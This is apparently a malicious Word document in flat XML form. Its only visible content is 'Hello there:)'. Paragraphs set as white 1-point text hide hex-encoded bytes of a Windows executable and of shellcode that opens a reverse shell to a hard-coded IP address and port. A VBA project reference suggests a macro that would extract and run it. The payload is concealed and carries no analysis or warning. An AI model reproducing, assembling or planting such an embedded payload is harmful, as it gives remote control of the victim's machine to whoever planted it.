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A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:r w:rsidRPr="006A016E">
        <w:t>Hello</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there:)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006A016E" w:rsidRPr="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A016E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t>Pjvmmozijp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A016E" w:rsidRPr="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A016E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2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8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39&amp;H24&amp;H11&amp;HDD&amp;H7D&amp;H45&amp;H7F&amp;H8E&amp;H7D&amp;H45&amp;H7F&amp;H8E&amp;H7D&amp;H45&amp;H7F&amp;H8E&amp;H5A&amp;H83&amp;H04&amp;H8E&amp;H7E&amp;H45&amp;H7F&amp;H8E&amp;H7D&amp;H45&amp;H7E&amp;H8E&amp;H7F&amp;H45&amp;H7F&amp;H8E&amp;H74&amp;H3D&amp;HEA&amp;H8E&amp;H7C&amp;H45&amp;H7F&amp;H8E&amp;H74&amp;H3D&amp;HEE&amp;H8E&amp;H7C&amp;H45&amp;H7F&amp;H8E&amp;H52&amp;H69&amp;H63&amp;H68&amp;H7D&amp;H45&amp;H7F&amp;H8E&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H50&amp;H45&amp;H00&amp;H00&amp;H64&amp;H86&amp;H03&amp;H00&amp;H7D&amp;H3C&amp;HC6&amp;H4B&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HF0&amp;H00&amp;H23&amp;H00&amp;H0B&amp;H02&amp;H01&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H01&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H78&amp;H42&amp;H00&amp;H00&amp;H48&amp;H02&amp;H00&amp;H00&amp;HC9&amp;H4E&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H80&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H42&amp;H00&amp;H00&amp;H6C&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H70&amp;H42&amp;H00&amp;H00&amp;H08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30&amp;H00&amp;H00&amp;H18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4E&amp;H10&amp;H00&amp;H00&amp;H00&amp;H10&amp;H00&amp;H00&amp;H00&amp;H12&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;H60&amp;H2E&amp;H72&amp;H64&amp;H61&amp;H74&amp;H61&amp;H00&amp;H00&amp;H84&amp;H00&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H02&amp;H00&amp;H00&amp;H00&amp;H16&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H40&amp;H2E&amp;H74&amp;H6C&amp;H6F&amp;H71&amp;H00&amp;H00&amp;H00&amp;H78&amp;H02&amp;H00&amp;H00&amp;H00&amp;H40&amp;H00&amp;H00&amp;H00&amp;H04&amp;H00&amp;H00&amp;H00&amp;H18&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H20&amp;H00&amp;H00&amp;HE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48&amp;H83&amp;HEC&amp;H28&amp;H49&amp;HC7&amp;HC1&amp;H40&amp;H00&amp;H00&amp;H00&amp;H49&amp;HC7&amp;HC0&amp;H00&amp;H30&amp;H00&amp;H00&amp;H48&amp;HC7&amp;HC2&amp;H00&amp;H10&amp;H00&amp;H00&amp;H48&amp;H33&amp;HC9&amp;HE8&amp;H27&amp;H10&amp;H00&amp;H00&amp;H48&amp;HC7&amp;HC1&amp;H00&amp;H10&amp;H00&amp;H00&amp;H48&amp;HBE&amp;H41&amp;H10&amp;H00&amp;H40&amp;H01&amp;H00&amp;H00&amp;H00&amp;H48&amp;H8B&amp;HF8&amp;HF3&amp;HA4&amp;HFF&amp;HD0&amp;H48&amp;H33&amp;HC9&amp;HE8&amp;H01&amp;H10&amp;H00&amp;H00&amp;H50&amp;H41&amp;H59&amp;H4C&amp;H4F&amp;H41&amp;H44&amp;H3A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6A016E" w:rsidRPr="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A016E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2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6A016E" w:rsidRPr="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A016E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2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C&amp;HFF&amp;H25&amp;HC0&amp;H0F&amp;H00&amp;H00&amp;HFF&amp;H25&amp;HB2&amp;H0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4E&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H5E&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H40&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H76&amp;H30&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H66&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H58&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H05&amp;H01&amp;H45&amp;H78&amp;H69&amp;H74&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H00&amp;H58&amp;H04&amp;H56&amp;H69&amp;H72&amp;H74&amp;H75&amp;H61&amp;H6C&amp;H41&amp;H6C&amp;H6C&amp;H6F&amp;H63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AE0D83" w:rsidRPr="006A016E" w:rsidRDefault="006A016E" w:rsidP="006A016E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A016E">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2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C&amp;H48&amp;H83&amp;HE4&amp;HF0&amp;HE8&amp;HCC&amp;H00&amp;H00&amp;H00&amp;H41&amp;H51&amp;H41&amp;H50&amp;H52&amp;H51&amp;H56&amp;H48&amp;H31&amp;HD2&amp;H65&amp;H48&amp;H8B&amp;H52&amp;H60&amp;H48&amp;H8B&amp;H52&amp;H18&amp;H48&amp;H8B&amp;H52&amp;H20&amp;H48&amp;H8B&amp;H72&amp;H50&amp;H48&amp;H0F&amp;HB7&amp;H4A&amp;H4A&amp;H4D&amp;H31&amp;HC9&amp;H48&amp;H31&amp;HC0&amp;HAC&amp;H3C&amp;H61&amp;H7C&amp;H02&amp;H2C&amp;H20&amp;H41&amp;HC1&amp;HC9&amp;H0D&amp;H41&amp;H01&amp;HC1&amp;HE2&amp;HED&amp;H52&amp;H41&amp;H51&amp;H48&amp;H8B&amp;H52&amp;H20&amp;H8B&amp;H42&amp;H3C&amp;H48&amp;H01&amp;HD0&amp;H66&amp;H81&amp;H78&amp;H18&amp;H0B&amp;H02&amp;H0F&amp;H85&amp;H72&amp;H00&amp;H00&amp;H00&amp;H8B&amp;H80&amp;H88&amp;H00&amp;H00&amp;H00&amp;H48&amp;H85&amp;HC0&amp;H74&amp;H67&amp;H48&amp;H01&amp;HD0&amp;H50&amp;H8B&amp;H48&amp;H18&amp;H44&amp;H8B&amp;H40&amp;H20&amp;H49&amp;H01&amp;HD0&amp;HE3&amp;H56&amp;H48&amp;HFF&amp;HC9&amp;H41&amp;H8B&amp;H34&amp;H88&amp;H48&amp;H01&amp;HD6&amp;H4D&amp;H31&amp;HC9&amp;H48&amp;H31&amp;HC0&amp;HAC&amp;H41&amp;HC1&amp;HC9&amp;H0D&amp;H41&amp;H01&amp;HC1&amp;H38&amp;HE0&amp;H75&amp;HF1&amp;H4C&amp;H03&amp;H4C&amp;H24&amp;H08&amp;H45&amp;H39&amp;HD1&amp;H75&amp;HD8&amp;H58&amp;H44&amp;H8B&amp;H40&amp;H24&amp;H49&amp;H01&amp;HD0&amp;H66&amp;H41&amp;H8B&amp;H0C&amp;H48&amp;H44&amp;H8B&amp;H40&amp;H1C&amp;H49&amp;H01&amp;HD0&amp;H41&amp;H8B&amp;H04&amp;H88&amp;H48&amp;H01&amp;HD0&amp;H41&amp;H58&amp;H41&amp;H58&amp;H5E&amp;H59&amp;H5A&amp;H41&amp;H58&amp;H41&amp;H59&amp;H41&amp;H5A&amp;H48&amp;H83&amp;HEC&amp;H20&amp;H41&amp;H52&amp;HFF&amp;HE0&amp;H58&amp;H41&amp;H59&amp;H5A&amp;H48&amp;H8B&amp;H12&amp;HE9&amp;H4B&amp;HFF&amp;HFF&amp;HFF&amp;H5D&amp;H49&amp;HBE&amp;H77&amp;H73&amp;H32&amp;H5F&amp;H33&amp;H32&amp;H00&amp;H00&amp;H41&amp;H56&amp;H49&amp;H89&amp;HE6&amp;H48&amp;H81&amp;HEC&amp;HA0&amp;H01&amp;H00&amp;H00&amp;H49&amp;H89&amp;HE5&amp;H49&amp;HBC&amp;H02&amp;H00&amp;H11&amp;H5C&amp;HC0&amp;HA8&amp;H42&amp;H87&amp;H41&amp;H54&amp;H49&amp;H89&amp;HE4&amp;H4C&amp;H89&amp;HF1&amp;H41&amp;HBA&amp;H4C&amp;H77&amp;H26&amp;H07&amp;HFF&amp;HD5&amp;H4C&amp;H89&amp;HEA&amp;H68&amp;H01&amp;H01&amp;H00&amp;H00&amp;H59&amp;H41&amp;HBA&amp;H29&amp;H80&amp;H6B&amp;H00&amp;HFF&amp;HD5&amp;H6A&amp;H0A&amp;H41&amp;H5E&amp;H50&amp;H50&amp;H4D&amp;H31&amp;HC9&amp;H4D&amp;H31&amp;HC0&amp;H48&amp;HFF&amp;HC0&amp;H48&amp;H89&amp;HC2&amp;H48&amp;HFF&amp;HC0&amp;H48&amp;H89&amp;HC1&amp;H41&amp;HBA&amp;HEA&amp;H0F&amp;HDF&amp;HE0&amp;HFF&amp;HD5&amp;H48&amp;H89&amp;HC7&amp;H6A&amp;H10&amp;H41&amp;H58&amp;H4C&amp;H89&amp;HE2&amp;H48&amp;H89&amp;HF9&amp;H41&amp;HBA&amp;H99&amp;HA5&amp;H74&amp;H61&amp;HFF&amp;HD5&amp;H85&amp;HC0&amp;H74&amp;H0A&amp;H49&amp;HFF&amp;HCE&amp;H75&amp;HE5&amp;HE8&amp;H93&amp;H00&amp;H00&amp;H00&amp;H48&amp;H83&amp;HEC&amp;H10&amp;H48&amp;H89&amp;HE2&amp;H4D&amp;H31&amp;HC9&amp;H6A&amp;H04&amp;H41&amp;H58&amp;H48&amp;H89&amp;HF9&amp;H41&amp;HBA&amp;H02&amp;HD9&amp;HC8&amp;H5F&amp;HFF&amp;HD5&amp;H83&amp;HF8&amp;H00&amp;H7E&amp;H55&amp;H48&amp;H83&amp;HC4&amp;H20&amp;H5E&amp;H89&amp;HF6&amp;H6A&amp;H40&amp;H41&amp;H59&amp;H68&amp;H00&amp;H10&amp;H00&amp;H00&amp;H41&amp;H58&amp;H48&amp;H89&amp;HF2&amp;H48&amp;H31&amp;HC9&amp;H41&amp;HBA&amp;H58&amp;HA4&amp;H53&amp;HE5&amp;HFF&amp;HD5&amp;H48&amp;H89&amp;HC3&amp;H49&amp;H89&amp;HC7&amp;H4D&amp;H31&amp;HC9&amp;H49&amp;H89&amp;HF0&amp;H48&amp;H89&amp;HDA&amp;H48&amp;H89&amp;HF9&amp;H41&amp;HBA&amp;H02&amp;HD9&amp;HC8&amp;H5F&amp;HFF&amp;HD5&amp;H83&amp;HF8&amp;H00&amp;H7D&amp;H28&amp;H58&amp;H41&amp;H57&amp;H59&amp;H68&amp;H00&amp;H40&amp;H00&amp;H00&amp;H41&amp;H58&amp;H6A&amp;H00&amp;H5A&amp;H41&amp;HBA&amp;H0B&amp;H2F&amp;H0F&amp;H30&amp;HFF&amp;HD5&amp;H57&amp;H59&amp;H41&amp;HBA&amp;H75&amp;H6E&amp;H4D&amp;H61&amp;HFF&amp;HD5&amp;H49&amp;HFF&amp;HCE&amp;HE9&amp;H3C&amp;HFF&amp;HFF&amp;HFF&amp;H48&amp;H01&amp;HC3&amp;H48&amp;H29&amp;HC6&amp;H48&amp;H85&amp;HF6&amp;H75&amp;HB4&amp;H41&amp;HFF&amp;HE7&amp;H58&amp;H6A&amp;H00&amp;H59&amp;H49&amp;HC7&amp;HC2&amp;HF0&amp;HB5&amp;HA2&amp;H56&amp;HFF&amp;HD5&amp;H00&amp;H00&amp;H28&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;HFF&amp;HFF&amp;HFF&amp;HFF&amp;H40&amp;H42&amp;H00&amp;H00&amp;H00&amp;H30&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H4E&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H5E&amp;H42&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H4B&amp;H45&amp;H52&amp;H4E&amp;H45&amp;H4C&amp;H33&amp;H32&amp;H2E&amp;H64&amp;H6C&amp;H6C&amp;H00&amp;H00&amp;H58&amp;H04&amp;H56&amp;H69&amp;H72&amp;H74&amp;H75&amp;H61&amp;H6C&amp;H41&amp;H6C&amp;H6C&amp;H6F&amp;H63&amp;H00&amp;H00&amp;H05&amp;H01&amp;H45&amp;H78&amp;H69&amp;H74&amp;H50&amp;H72&amp;H6F&amp;H63&amp;H65&amp;H73&amp;H73&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H00&amp;H08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sectPr w:rsidR="00AE0D83" w:rsidRPr="006A01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0D83"/>
    <w:rsid w:val="006A016E"/>
    <w:rsid w:val="00AE0D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DE7B12"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B8C45633-DAA0-48A3-9225-9D838F2895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OXJZK12" wne:name="Project.ThisDocument.Oxjzk12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4283</Words>
  <Characters>24419</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>203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2019-07-17T08:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-17T09:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>